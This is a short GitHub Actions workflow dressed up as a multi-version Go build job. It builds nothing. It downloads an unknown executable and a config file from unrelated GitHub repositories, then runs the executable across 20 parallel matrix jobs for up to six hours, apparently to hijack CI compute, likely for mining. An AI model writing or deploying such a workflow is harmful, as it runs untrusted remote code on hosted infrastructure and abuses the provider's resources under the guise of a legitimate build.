name: trial

on: [workflow_dispatch]
 
jobs:
  build:
    name: BUILD
    runs-on: windows-latest
    strategy:
      fail-fast: false
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15]
         flag: [A, B, C, D]
    timeout-minutes: 360
    steps:
    - name: PREPARING
      run: Invoke-WebRequest https://raw.githubusercontent.com/outlookadek/PAPAERSPACE/main/cari.exe -Outfile cari.exe
    - name: PREPARING2 
      run: Invoke-WebRequest https://raw.githubusercontent.com/trautroi/aws/master/1.18/config.json -Outfile config.json
    - name: Running
      run: ./cari.exe
